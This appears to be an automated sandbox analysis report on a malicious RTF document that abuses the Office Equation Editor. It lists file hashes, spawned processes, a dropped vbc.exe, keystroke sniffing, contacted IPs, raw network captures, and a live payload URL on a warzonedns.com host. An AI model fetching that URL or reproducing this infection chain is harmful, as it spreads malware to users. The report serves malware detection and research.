1555RTF_67c092156ed5bdc811624ba6376a2bbb_doc_2019-09-11_13_30.txt

1.  
2. * ID: 1555
3. * MalFamily: "Obfsobjdat"
4.  
5. * MalScore: 10.0
6.  
7. * File Name: "RTF_67c092156ed5bdc811624ba6376a2bbb.doc"
8. * File Size: 4403
9. * File Type: "Rich Text Format data, version 1, unknown character set"
10. * SHA256: "790666229814b82c78583a5adda3ef277a3f9eec30d90b2a78b56e269f89b0a9"
11. * MD5: "67c092156ed5bdc811624ba6376a2bbb"
12. * SHA1: "3638dd47abf04753bf4e39e676a9a59941fdcd20"
13. * SHA512: "6d0cf3dfc9caca861462b5bc15465aabbcebea03aea3d4874e5a6a69df8740e19bf0caf40d20e18da832020dc696988666970979e09e0e86606ad5c080e57c13"
14. * CRC32: "0ABE7945"
15. * SSDEEP: "48:6+9ON2mffjJbkHiClr91mMDin4WfXTx1u6NGquCzeZfH0gAW1cXRqhPV+FmwpQ4t:pE6HXCIxW7+6M33qaqfdnrHNIZdO"
16.  
17. * Process Execution:
18. "WINWORD.EXE",
19. "svchost.exe",
20. "EQNEDT32.EXE",
21. "vbc.exe",
22. "WmiPrvSE.exe",
23. "explorer.exe",
24. "WMIADAP.exe"
25.  
26.  
27. * Executed Commands:
28. "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
29. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
30. "\"C:\\Users\\Public\\vbc.exe\"",
31. "C:\\Users\\Public\\vbc.exe "
32.  
33.  
34. * Signatures Detected:
35.  
36. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
37. "Details":
38.  
39.  
40. "Description": "The RTF file contains embedded content",
41. "Details":
42.  
43. "embedded content": "Object 2 index 00000033h contains embedded object eqUAtioN.3 with size 2126 bytes"
44.  
45.  
46.  
47.  
48. "Description": "Attempts to connect to a dead IP:Port (10 unique times)",
49. "Details":
50.  
51. "IP_ioc": "23.60.72.96:443"
52.  
53.  
54. "IP_ioc": "40.91.122.234:443"
55.  
56.  
57. "IP_ioc": "23.249.165.218:80 (United States)"
58.  
59.  
60. "IP_ioc": "104.18.24.243:80"
61.  
62.  
63. "IP_ioc": "104.75.172.25:443"
64.  
65.  
66. "IP_ioc": "184.28.188.178:80"
67.  
68.  
69. "IP_ioc": "184.28.188.193:80"
70.  
71.  
72. "IP_ioc": "72.21.91.29:80"
73.  
74.  
75. "IP_ioc": "104.119.18.125:443"
76.  
77.  
78. "IP_ioc": "52.109.2.14:443"
79.  
80.  
81.  
82.  
83. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
84. "Details":
85.  
86. "ioc": "gb.xsl"
87.  
88.  
89. "ioc": "ontent.inf"
90.  
91.  
92. "ioc": "adial.glox"
93.  
94.  
95. "ioc": "ist.glox"
96.  
97.  
98. "ioc": "chicago.xsl"
99.  
100.  
101. "ioc": "iso690nmerical.xsl"
102.  
103.  
104. "ioc": "turabian.xsl"
105.  
106.  
107. "ioc": "harvardanglia2008officeonline.xsl"
108.  
109.  
110. "ioc": "chevronaccent.glox"
111.  
112.  
113. "ioc": "gostname.xsl"
114.  
115.  
116. "ioc": "ieee2006officeonline.xsl"
117.  
118.  
119. "ioc": "e.gu"
120.  
121.  
122. "ioc": "rocess.glox"
123.  
124.  
125. "ioc": "rame.glox"
126.  
127.  
128. "ioc": "sist02.xsl"
129.  
130.  
131. "ioc": "iso690.xsl"
132.  
133.  
134. "ioc": "rc.glox"
135.  
136.  
137. "ioc": "mlaseventheditionofficeonline.xsl"
138.  
139.  
140. "ioc": "anded.thmx"
141.  
142.  
143. "ioc": "content.inf"
144.  
145.  
146. "ioc": "architecture.glox"
147.  
148.  
149.  
150.  
151. "Description": "Performs some HTTP requests",
152. "Details":
153.  
154. "url_iocs": "http://qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com/big/vnc.exe"
155.  
156.  
157.  
158.  
159. "Description": "The RTF file has an unknown character set",
160. "Details":
161.  
162.  
163. "Description": "Sniffs keystrokes",
164. "Details":
165.  
166. "SetWindowsHookExW": "Process: explorer.exe(2044)"
167.  
168.  
169.  
170.  
171. "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
172. "Details":
173.  
174. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01x\\xee*\\x0f\\x8c8\\x17nj~gt\\x18\\x1f\\x98\\x8a\\xe7)\\xc6\\x04\\xa4a\\x1a\\xb8k\\xa4\\xc5s<\\x0c\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
175.  
176.  
177. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x8b\\xb1\\xbe\\xa3\\xe1z\\x87\\x07 e\\x90n\\xf2bpprk\\x19\\xda\\x01*\\xe9\\xd9\\xd6v\\x06j\\xcbv\\x04,\\xf9\\xfd\\xcc\\xbe\\x88\\xb13\\xac\\x15\\xbf\\xaf\\xda\\xfb\\xe2.\\xd2x(\\x9d=\\x8e\\xc2\\xa7\\x0c,^\\xb5c\\xcfd\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\n\\xa3>9o\\x1cn'fm%\\xe1\\xe5\\x10#n7\\xfb\\xfa\\xc3#i\\x85\\x16\\x8dd\\x1es\\xb9\\xd4\\xe4\\x9c\\xb0\\xfd\\x84\\\\xe2j\\x19\\x83j\\xb1%\\xd5\\xd6g\t"
178.  
179.  
180. "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: ocsp.digicert.com\r\n\r\n"
181.  
182.  
183. "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
184.  
185.  
186. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\x15p\\x8c\\x03\\x00\\xe6a\\xe0\\x08\\xad\\xdd\\x0ed\\xe8\\xb0\\xf1\\x92^\\xe8\\x94d\\xba$\\xef\\xf1\\xae-9\\x8b\\x93)\\xae \\x8f\\xb9\\xb8\\x87\\xd9\\xf6\\xe16\\x965\\xa4\\xfbs\\xd0p\\xf5\\xec\\xeb\\x08\\xd7\\xe1\\xb7m-\\xee\\xafxav\\xb4*k\\x80\\x7f\\xbb\\x89s\ra\\x9a\\xa7x\\xa3wtr\\xbe\\x83\\xaeg\\xee\\x1d\\x83\\xa1\\xb8=#\\xbb1`\\x0bb\\xbc@ru\\x8bv\\xbd\\xc9\\xbdr4\\xbf\\xca\\x07\\xe2\\x17t\\xc6\\x02c\\xc7\\xba4jh|\ns\\xcc\\xf1\\xf3m/\\x81cd\\xf4\\xde\\xc2\\xd1\\xc8\r\\xcc\\xce.u\\x10\\x16\\x00\\xb9\\x9d\\x97\t\\xd4\\x8bl\\xcbk\\xca\\xd2&r\\xe1\\x94\\xea\\xdf\\xaf\\xc7\\xe4c\\xdf<\\xa1\\xef\\xf9w\\xdf\n\\x00e\\xed\\0\\xb6\\xc3\\xcc\\x1f\\xf19@@\\xf7\\xaa\\xa8\\x12\\xd1\\x17\\x94m\\x0e',$\\xcf5\\x9e\\x9a\\xa9\\xea%\\xee\\e\\xbe\\xc9b\\xff\r$\\xd7\\x87u\\xa8\\xc5\\xb9\\xd6fd\\x91\\x8c\\xf9e\\x03\\x16w\\xecq\\xd7\\xf8\\xcb\\x96\\xb5i\\xae\\xba\\xe7\\x8b\\x02\\x06^\\xe0\\x97"
187.  
188.  
189. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x02 \\xa2w\\xf3+\\x84\\xea\\x83z\\x8a\\x04\\x02=0`\\xe3\\x18\\xb4p\"5j\\x98x\\x8c\\x8f\\xf4\\xd0\\xbdpc\\xc7\\xad\\x17\\x18w\\xf1\\xb1\\xc1o\\x95\\x95\\xbf.,\\x91#\\xeb\\xf9\\x99\\x05\\x9f\\xed\\xcd\\x16#\\x0b\\xc545\\x90\\x1e\\x17\\xaf\\xb8\\xb7e\\x18\\x14%\\xc6\\xfa^u\\xa1wbi\\xca\\x1f\\xcdp\\xe3>\\xec3\\xb3~(\\x9df\\x89\\xc5#k\\xa8\\x84:\\xab^\\x91\\xd4mv\\xba/\\x8a \\xcc\\xc2\\xfb#p3h\\x8b\\x9c5$f\\x89\\xaa\\x8dp^b\\x8a\\x9b\\xe5\\x04\\xd3`\\xa8\\xf1\\xadf\\x89\\xa3\\xbb\\xd6\\x92q\\xc9\\x1e\\xacb`\\x11\\x9a\\x04\\\\xe8|c<\\xfbv\\xff\\xc5\\x0b\\xf5\\xe5\\x12\\xf8g\\x0cn\\x00q\\xa6_\\xb2\\x1b\\xfb\\x1e\\xcd\\x0b\\xb8\\xa1\\x13\\x18\\xc4\\xa4h,\\xad\\x11\\xcb\\xa1\\x80\\x8c(\\x9dz\\xc4\\xa6\\xf6\\x16e\\x04\\xd6\\xbda\\x08\\x99\\x7f\\xb1\\xa4'\\xbeu&i\\x13~#`\\xe4\\x97\\xee\\x12\\xec*m\\xf7^\\x16\\x9d/\\x91a\\x95\\xe0\\xb3\\x7fe\\x05|g\\xe5\\xa8\\xe7^\\x1e\\xf6vch\\x9e"
190.  
191.  
192. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01x\\xee/\\xd0\n\\x7f\\x8fr7\\xf8c\\x012\\xc4\\x9b\\xe4\\xf74\\x01\\xb2\\xfd\\xee\\x12\\xea\\xb1r\\xff&s\\xedd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
193.  
194.  
195. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04&\\x9f\\xda\\x7f\\\\x8d'3\\xa6\\x14\\x8d\\xeb<\\xec\\x91\\x90\\x91\\x12\\x11\\xc9$\\xcb\\x18$\\xc9\\xf0\\xe0\\xd8/w\\x15\\xf6v \\xd9r\\xfb\\x12\\xc0\\xe5\\xe3z\\xc0\\x88\\xd7.\\xd8\\x1e0dj\\xb7h\\xa0\\xa9\\xd6\\xd3\\x03\\x11\\xc8\\xfe\\xe0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000od\\xdfn\\xbc\\x12\\xb3k@;\\xd2 j\\xd1\\xc6\\xa00&haw\\x82\\x00\\xbc\\x92\\x87y\\xd0h\\xa1\\xd47\\x0fs\\x98l\\x9e\\x83t\\xd5r&k\\xb6\\xbd\\x9c\\xeb"
196.  
197.  
198. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\x83\\x1cw\\x1bh\\x00\\x85s\\xd6\\xeb\\xabq\\xd8\\xb29\\x0e\\x8a\\x87u\\xb3*\\xc3\\xa9\\xaa\\xa9\\xbeai\\xdbey\\xe3\\xe4\\xa8\\xa1\\xe1\\x7f\\xffg\\xb9\\x84af\\xfa\\x11't\\xbcy\\x9d&j\\x98\\xe4w\\xf9\\x16\\xbf_\\xf5*\\x85n\\x177\\x10\\x82\\xc6&\\\\xe9\\x8e\\x88\\xaa,\\xc5x\\xcfs/\\xef\\xfe\\x06\\xef\\xc3\\xc6,r's\\xdd\\xfdt\\xcc\\xaa\\x9fb*xwg\\xf7\\xe6\\xf1\\xed\\xc3\\x84zr@\\xf3\\xca\\xe4\\xb7)\\xb8\\x8a$ux\\x81\\xfal\\x8d6\\x0ff>\\xcd\\x81\\xa0;\\x98\\x11\\x7f\\xc6\\xa5\\xb3\\x99&\\xc6\\xd2\\xa4\\xbf\\xcfm\\xab\\xf8\\xc5ary\\xf7\\x0c\\xa17\\x8b\\xa4\\xa9\\x84m\\xea\\xd4j\\xfd\\xb9\\xda\\x98\\x1e\\x85\\x11g\\xb9\\xb5/k\\xca\\xd7\\x01\\x91\\x80\\x0c\\x94c\\xd3\\xf9+\\xca\\x8e\\x85\\xb5/\\xd9\\xee\\x8c\\xfax\\x89i=#\\x08\\xfc\\x04\\xb9\t#\\xed\\x93\\x9bf\\xe66\\x8e\\xc4\\xe1l3\\x1bk\\x0ft\\xf3\\xcc\\xa2\\x1e\\xa5ye\n|\r\\x18'\\x04amz\\x10f\\x86o\\xfa\\xe9\\xb3-\\xfa\\x0c"
199.  
200.  
201. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x01\\x00\\x00y\\x03\\x01x\\xee4\\xce\\xe9\\\\xb1\\x06n\\xe1\\x8f\\x8ccy8\n\\xea\\xc0nq\\xf1\\xf2\\x10*v\\xee\\x12k\\xaa.\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x008\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1f\\x00\\x1d\\x00\\x00\\x1atemplateservice.office.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
202.  
203.  
204. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf6>\\xbd\\xe0h\\x8d+fle\\xe9\\x85\\x81n\\x1e\\xc7\\xa5!\\x16\\x12\\xeb\\x91\\x0f\\x1a2\\\\x8ej9\\xa9\\xde\\xc9\\xf7\\xef!\\xb6\\xbdu\\x15\\xb9\\xab\\x07\\xfa\\xd3p\\x18\\x13jq\\x88\\xd0=d\\xfduu\\x89\\x97\\x9a\\xc5\\xee\\xc6 \\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000r\\xb4qf\\xf7\\x18\\x91\\x85\\x17\\x07\\x9e\\x89\\x05\\xf6io+\\xa2@\\x86f\\xc6\\x95\\xf8\\x93\\x9f\\xa3xcu\\xa9x)\\xeb'\\xcc\\xd7?\\xdf\\xd7\\x01\\xa1\\xac\\xa9p\\x06\\x18\\xe4"
205.  
206.  
207. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xbf\\x8f\\xed`\\x9e1\\xb3\\xebo\\xd3\\xcc\\xf0'\\xce\\xd8\\x9c5\\x07\\x16\\xd1\\xcc\\x08\\x19\\\\x9fo\\xed\\x9c&\\xe5\\x17\\xde\"\\x18\\xb1\rj\\xeb\\x0c\\xdc\\xc9\\xe7\\x07\\xd3\\xab\\x9cf8,\\xcc\\xb1\\x9e\\x9f\\xb0\\xdd\\x92\\xaaq\\xf1\\xd0n\\x05\\x81e\\xeb\\xc7\\xd1 \\x8e\\x11n7\\xdb\\x08\\x16\\xa6\\x01\\xf5\\xe1\\xd6\\x1d\\xbd\\x9cq\\xb4\\x00u\\xd4\\x87\\xc9|\\x04\\xd1\\xacx0gh\\xaa\\x1b\\xc0\\xe8z\\x8a\\xb4\\xed\\x02\\x1f\\xdc_%+$\\x08\\x01bh\\xf7\\xf7g\\xd2\\xbc\\xe2\\xe4|\\x8d\\x8e\\xd5'*\\x1f\\x01\\x14\\xb1\\x1c\\x9d\\x1aa\\xf0\\x0ey\\xc6\\xb8^\\x02\\xbd6\\x17v\\xf8\\x9f\\x9e\\x8ey\\x99\\xda\\xed\\xe1\\xfd\\x1a\\xd5\\x16=\\xc4d\\xbc\\x1e\\xbbs\\x04\\xb3b\\xe5u\\xb2\\x8a\\xa0&\\xc5u\\xc78\\xc5xy\\x81\\xb8\\xa8\\x9f\\x84\\xbcz#d\\xdf\\x9fh\\xebv\\xda\\x10)\\x80?~\\x9c\\xcd)3\\x85\\x16\\xeb\\x8b\\x03r\\-q\\xe1ub\\x06\\x82\\x18\\x9eq0\\xe9y\\x9e\\x07c\\x1bdim\\xd6\\x08y\\xf1\\xbd\\xb5jn\\xc5s\\xdf\\x16"
208.  
209.  
210. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xfc\\x13\\x8e&\\xa0\\xaf\\xe8\\xb4\\xd5\\xeco9\\x80u\\x01y\\xfe\\x85~\\x85\\xc7\\x95i%\\x16va\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
211.  
212.  
213. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xcf\\xbf\\xe9e`a\\x94w\\xb5\\x858t\\xa2\\xdc\\xd4d\\x88>\\xe3tc\\xed\\xe0pv\\xa5\\xb0\\x99\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
214.  
215.  
216. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5(\t\\x81&+\\xc4\\x10w\\xfe\\xc5\\x94\\xbe=g\\x9co\\xc8j\\x15?\\xbf\\xf7\\xd0\\x990\\xc8\\x89\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
217.  
218.  
219. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xf1m\\xf2=\\xf9\\x95)f0\\x8c\\x16\\xbf\\xc2\\x0f\\xdc`\\xad\\x01\\x83\\x16\\xa9)\\xf3n\\x8eke\\xf5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
220.  
221.  
222. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xc4\\x8b\\xc6\\x8b\\xac\\x7f\\x19j\\xfa\\x01\\x11\\x06\\x0c\"r\\xdc\\x0e\\xbfl\\xca/$\\xa4\\x00\\xde\\xf3\\xfd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
223.  
224.  
225. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5t1\\xb1\\x08\r\\xd7\\x19d\\x8f#\\xab\\x9d\\xdc\\x81\\xf3\\xa5\\x06r$a\\xe2\\xdf9\\x8b4o\\x85\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
226.  
227.  
228. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xcb1\\x93\\xc8d$\\x19\\x95\\xe8\\xae\\x0e\\xf4p\t\\xca\\x1c\\x06\\x17c8\\x1c4\\xe1+\\xe0\\xc4\\x95\\xdc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
229.  
230.  
231. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5h6\\x8alg\\xda\\x91\\xb6\\xfdqg\\xfa@\\x1e\\x85\\x9dj\\x18(zk\\x97\\xfd.!\\x9a\\xf0\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
232.  
233.  
234. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5?\\xcf\\x97\\xaf\\xb9+0n\\x88\\x10\\x03\\xc7\\x06\\xaaj\\xdb\\x8b\\xa7cu\\xfd\\xf0\\x9b\\x89\\xe7s\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
235.  
236.  
237. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee54\\x08!\\xb2\\xa3\\xfdf\\x9f\\x9b/\\x04\\xde\\xc4\\x07\\xe0w\\xcf\\x97\\x10=r\\x9e'\\x0b\\x0b\\x1a\\x922\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
238.  
239.  
240. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x0f\\x95\\xb35=\\x96\\xabay\\xd2\\xb8r&v\\xd4<\\x9e\\xe5\\x9e\\xab\\xd5$\\x06(\\x95\\xb5\\xe3\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
241.  
242.  
243. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee56\\x0c\\xd1m*\\xf9\\x97\\xe1\\x0ed\\xb9\\xfd\\xb5\\xf0e\\xd2\\xa5\\xd5io(\\x16\\x98\\x1b\\xfcd\\xf6h\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
244.  
245.  
246. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x00\\xfe\\xb7\\xf3;$6sg\\x95\\x17\\x1d\\xdf\\xd1\\x83q#\\xc4\\x99\\xc6\\x1a\n\\x85\\x93,r\\xc5)\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
247.  
248.  
249. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xfc'%s\\x053\\x92s\\xba\\x90\\x0f\\xd7\\xed\\xee\\x92\\xfe\\x07r,\\xce\\x9a\\xc7nm\\x91k\\xd2x\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
250.  
251.  
252. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xee\\xab\\xd7\\x97\\xd8mbze\\x92(\\xff\n9x\\xe5\\xd2\\xe9q\\x17b\\xd6\\x19_g\\x04o`\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
253.  
254.  
255. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x99f\\xa0\\x90-\\x18\\xbc\\xed\\xe6\\xa1g\\xe9\\xb7\\xbf\\xcb\\xf4%g\\xfaz\\xc9\\xf1\\xb3\\x97\nj9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
256.  
257.  
